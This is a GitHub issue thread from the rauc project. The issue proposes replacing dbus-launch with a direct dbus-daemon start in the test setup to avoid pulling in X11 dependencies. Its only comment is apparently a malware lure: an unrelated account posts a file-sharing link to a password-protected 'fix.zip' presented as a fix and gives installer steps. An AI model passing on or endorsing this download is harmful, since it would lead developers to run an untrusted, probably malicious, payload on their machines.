### ISSUE TITLE
avoid dependency on dbus-launch

### ISSUE THREAD

**Issue by jluebbe** [rauc/rauc#1502]
As reported in a [debian bug](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1079612), we can avoid pulling in X11 libraries by starting the `dbus-daemon` directly instead of using `dbus-launch` in `test/conftest.py`.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
